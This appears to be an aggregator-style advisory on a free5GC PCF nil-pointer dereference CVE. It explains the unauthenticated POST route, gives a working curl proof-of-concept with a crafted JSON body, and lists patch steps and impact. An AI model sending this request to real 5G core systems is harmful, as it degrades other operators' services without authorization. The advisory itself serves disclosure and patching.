Listen to this Post
How the mentioned CVE works:
The vulnerability exists in free5GC’s Policy Control Function (PCF) POST handler (HandleCreateSmPolicyRequest) at /npcf-smpolicycontrol/v1/sm-policies. When the handler makes a downstream OpenAPI consumer call to the Unified Data Repository (UDR) and receives a 404 Not Found, the consumer wrapper returns both a non-nil `err` and a nil response struct. Instead of returning after logging the OpenAPI error, the handler continues execution and dereferences the nil response struct on the subsequent line, causing a nil-pointer dereference panic. The Gin web framework’s recovery middleware catches the panic behind the scenes, converting it into an `HTTP 500 Internal Server Error` with an empty body. The trigger is a single POST containing input that causes the downstream UDR lookup to fail (e.g., an unknown DNN). In affected versions (v4.1.0 and v4.2.1), this endpoint is also reachable without an `Authorization` header because the PCF route group is mounted without inbound authentication middleware. As a result, an unauthenticated attacker can cause the PCF to return `HTTP 500` instead of a controlled 4xx/5xx error whenever the downstream lookup fails. The PCF process remains running, and the availability impact is limited to per-request degradation.
dailycve form
Platform: free5GC PCF
Version: v4.1.0, v4.2.1
Vulnerability: Nil Pointer Dereference
Severity: High
date: 2026-05-07
Prediction: Patch available 2026-05-07
What Undercode Say:
Analytics
In the validation lab, an attacker can trigger this issue with a single crafted POST. The following command reproduces the panic:
curl -sS -X POST 'http://10.100.200.9:8000/npcf-smpolicycontrol/v1/sm-policies' \
-H 'Content-Type: application/json' \
-d '{
"supi":"imsi-208930000000003",
"pduSessionId":1,
"dnn":"internet-bad",
"sliceInfo":{"sst":1,"sd":"010203"},
"servingNetwork":{"mcc":"208","mnc":"93"},
"accessType":"3GPP_ACCESS",
"notificationUri":"http://smf.free5gc.org:8000/npcf-smpolicycontrol/v1/notify"
}'
To monitor the PCF container logs for the panic, use:
docker logs <pcf_container_name> | grep -E "panic|runtime error"
Exploit:
- A single unauthenticated POST request to the vulnerable endpoint where the `dnn` value is unknown to the UDR.
- The request causes the downstream OpenAPI call to return
404 Not Found, which triggers the nil-pointer dereference. - The handler panics, and the Gin recovery middleware returns `HTTP 500 Internal Server Error` with an empty body.
Protection from this CVE
- Apply the upstream fix from free5gc/pcf62.
- Upgrade to a patched version of free5GC (post-v4.2.1).
- Implement proper error handling: after logging the OpenAPI error, the handler must return immediately instead of continuing to dereference the nil response.
- Use the provided patch or merge the relevant code changes that correct the exceptional branch handling.
Impact:
- NULL pointer dereference (CWE-476) caused by improper handling of an exceptional branch (CWE-754).
- The Gin recovery middleware catches the panic, so the PCF process is NOT killed; other endpoints continue serving.
- Confidentiality: No impact (the response is `HTTP 500` with empty body).
- Integrity: No persistent impact (the panic occurs before any state mutation).
- Availability: Limited to per-request degradation – each malicious POST results in an `HTTP 500` instead of a controlled error response.
- Unauthenticated attackers can reach this endpoint via the route-group authentication gap (free5gc/free5gc844).
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
